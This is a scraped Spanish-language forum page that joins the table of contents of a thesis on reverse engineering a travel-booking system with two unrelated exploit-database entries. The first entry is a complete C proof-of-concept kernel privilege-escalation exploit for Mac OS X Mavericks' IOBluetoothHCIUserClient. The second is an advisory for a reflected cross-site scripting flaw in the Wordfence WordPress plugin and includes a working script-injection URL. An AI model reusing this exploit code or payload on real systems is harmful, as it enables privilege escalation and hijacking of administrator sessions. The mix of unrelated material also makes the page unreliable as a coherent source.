4.1. Estudio del sistema existente 58
4.2. Recuperación arquitectónica 64
4.3. Documentación de los casos de uso 83
CAPITULO V
5. ESTADO DEL ARTE 916
5.1. Ingeniería Inversa en casos de uso UML 91
5.2. Ingeniería Inversa basado en diseño de patrones 94
CAPITULO VII
6. CONCLUSIONES 98
CAPITULO VII
7. RECOMENDACIONES 99
CAPITULO VIII
8. REFERENCIAS BIBLIOGRAFICAS 100
CAPITULO IX
9. ANEXOS 103
ANEXO Nº 01 103
ANEXO Nº 02 110 7
INDICE DE FIGURAS
Figura 1. Distribución del costo del ciclo de vida 16
Figura 2. Comparación del costo desarrollo y mantenimiento 17
Figura 3. Coste relativo aproximado de detectar y corregir defectos 19
Figura 4. El modelo de vistas "4+1" 29
Figura 5. Fases de la Ingeniería Inversa 45
Figura 6. Del código fuente hacia el modelo conceptual 56
Figura 7. Pantalla de Ingreso al sistema TravelPlus 60
Figura 8. Pantalla de Listado de Agencias y Usuarios 60
Figura 9. Pantalla de Ingreso de una nueva agencia 61
Figura 10. Pantalla de modificación de datos de una agencia 61
Figura 11. Pantalla de Búsquela de Hoteles 62
Figura 12. Pantalla de Hoteles Encontrados 62
Figura 13. Pantalla de Detalle de Hotel 63
Figura 14. Pantalla de Ingreso de datos de la reservación 63
Figura 15. Pantalla de Constancia de reservación 64
Figura 16. Descripción del modelo desde cinco vistas 65
Figura 17. Gestión del sistema TravelPlus 67
Figura 18. Diagrama de caso de uso – Gestión Agencia de Viajes 71
Figura 19. Diagrama de caso de uso – Gestión Usuarios 72
Figura 20. Diagrama de caso de uso – Reservación de Habitaciones 72
Figura 21. Diagrama de Clases de la capa de negocio 76
Figura 22. Clase ReservationDetail – Atributos y Métodos 78
Figura 23. Diagrama de Secuencia – Ingresar Nueva Agencia 80
Figura 24. Diagrama de Colaboración – Ingresar Nueva Agencia 81 8
Figura 25. Concepto del enrejado 93
Figura 26. Trabajando con paquetes 93
Figura 27. Visión general del ambiente SPOOL 95
Figura 28. Interfaz grafica del ambiente SPOOL 97

Ver en Linea: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#79
Mac OS X Mavericks IOBluetoothHCIUserClient Privilege Escalation Exploit
Fecha    2014-11-04
Categoria    dos / poc
Platforma    iOS

=============================

Código: text
/*
* pwn.c, by @rpaleari and @joystick
*
* This PoC exploits a missing sign check in
* IOBluetoothHCIUserClient::SimpleDispatchWL().
*
* Tested on  Mac OS X Mavericks (10.9.4/10.9.5).
*
* Compile with: gcc -Wall -o pwn{,.c} -framework IOKit
*
*/
 
#include <stdio.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
 
#include <IOKit/IOKitLib.h>
 
uint64_t payload() {
  /* Your payload goes here. */
}
 
int main(void) {
  /* Map our landing page (kernel will jump at tgt+7) */
  vm_address_t tgt = 0x0000048800000000;
  vm_allocate(mach_task_self(), &tgt, 0x1000, 0);
  vm_protect(mach_task_self(), tgt, 0x1000, 0,
         VM_PROT_READ|VM_PROT_WRITE|VM_PROT_EXECUTE);
  memset((void *)tgt, 0, 0x1000);
 
  /* Prepare payload */
  char *target = (char *)tgt;
   
  /* mov rax, payload */
  target[7] = 0x48;
  target[8] = 0xb8;
  *((uint64_t *)(&target[9])) = (uint64_t) payload;
   
  /* jmp rax */
  target[17] = 0xff;
  target[18] = 0xe0;
 
  printf(" [+] Payload function  @ %016llx\n", (uint64_t) payload);
  printf(" [+] Stored trampoline @ %016llx\n", (uint64_t) tgt+7);
 
  /* Find the vulnerable service */
  io_service_t service =
    IOServiceGetMatchingService(kIOMasterPortDefault,
                IOServiceMatching("IOBluetoothHCIController"));
   
  if (!service) {
    return -1;
  }
 
  /* Connect to the vulnerable service */
  io_connect_t port = (io_connect_t) 0;
  kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
  IOObjectRelease(service);
  if (kr != kIOReturnSuccess) {
    return kr;
  }
 
  printf(" [+] Opened connection to service on port: %d\n", port);
 
  /* The first 8 bytes must be 0, so we don't have to handle following
     parameters */
  char a[] = "\x00\x00\x00\x00\x00\x00\x00\x00"
    /* Don't really matter for the exploit (ignored due to the 0s above) */
    "\x00\x00\x00\x00\x00\x00\x00\x07\x02\x00\x00\x00\x11\x0a\x00\x00\x03\x72\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xfa\x2a\x54\xff\x7f\x00\x00\x78\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\xa8\xfb\x2a\x54\xff\x7f\x00\x00\xd8\xfa\x2a\x54\xff\x7f\x00\x00\x60\x4a\xb6\x86"
    "\x80\xff\xff\xff"
    /* Index value 0xfff5b6a8 makes _sRoutines[index] point to an in-kernel
       memory area that contains {0x0000048800000007, N}, with 0 <= N < 8. May
       need to be adjusted on other Mavericks versions. */
    "\xa8\xb6\xf5\xff\x80\xff\xff\xff";
   
  printf(" [+] Launching exploit!\n");
  kr = IOConnectCallMethod((mach_port_t) port,      /* Connection      */
                           (uint32_t) 0,            /* Selector        */
                           NULL, 0,                 /* input, inputCnt */
                           (const void*) a,         /* inputStruct     */
                           sizeof(a),               /* inputStructCnt  */
                           NULL, NULL, NULL, NULL); /* Output stuff    */
 
  /* Exec shell here after payload returns */
   
  return IOServiceClose(port);
}
#80
WordPress Wordfence Firewall 5.1.2 Cross Site Scripting Vulnerability
Fecha    2014-11-05
Categoria    web applications
Platforma    php
CVE    CVE-2014-4664

================================

Descripcion:
WordPress Wordfence Firewall plugin version 5.1.2 suffers from a cross site scripting vulnerability.


================================

Product: Wordfence Firewall Plugin For Wordpress
Vendor: Wordfence
Vulnerable Version(s): 5.1.2
Tested Version: 5.1.2
Advisory Publication:  June 30, 2014  [without technical details]
Vendor Notification: June 24, 2014
Vendor Patch: June 29, 2014
Public Disclosure: June 30, 2014
Vulnerability Type:Reflected Cross-Site Scripting
CVE Reference: CVE-2014-4664
Risk Level: High
Solution Status: Fixed by Vendor
---------------------------------------------------------------
Reported By  - Narendra Bhati ( R00t Sh3ll)
Security Analyst  @ Suma Soft Pvt. Ltd. , Pune ( India )IT Risk & Security Management Services , Pune ( India)
Facebook - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
twitter - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Blog - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Email - No tienes permitido ver los links. Registrarse o Entrar a mi cuenta@gmail.com

-----------------------------------------------------------------------------------------------

Advisory Details:


Narendra Bhati discovered vulnerability in Wordfence Firewall Plugin For Wordpress , which can be exploited to perform Cross-Site Scripting (XSS) attacks.


1) Reflected Cross-Site Scripting (XSS) in Wordfence Firewall Plugin For Wordpress : CVE-2014-4664

The vulnerability exists due to insufficient sanitization of input data passed via the "whoisval" HTTP GET parameter to "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" URL. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website.
This vulnerability can be used against website administrator to perform phishing attacks, steal potentially sensitive data and gain complete control over web application.

The exploitation example below uses the "";</script><script>alert(/Oooppps !!! Bhati Got A XSS In WordPress Popular Firewall Plugin Word Fence /)</script>" JavaScript function to display "Oooppps !!! Bhati Got A XSS In WordPress Popular Firewall Plugin Word Fence" word:

[url="http://127.0.0.1/wp-admin/admin.php?page=WordfenceWhois&whoisval=";"]http://127.0.0.1/wp-admin/admin.php?page=WordfenceWhois&whoisval=";[/url]</script><script>alert(/Oooppps !!! Bhati Got A XSS In WordPress Popular Firewall Plugin Word Fence /)</script>
-----------------------------------------------------------------------------------------------

Solution:

Update to " 5.1.4" From his official website or update from wordpress dashboard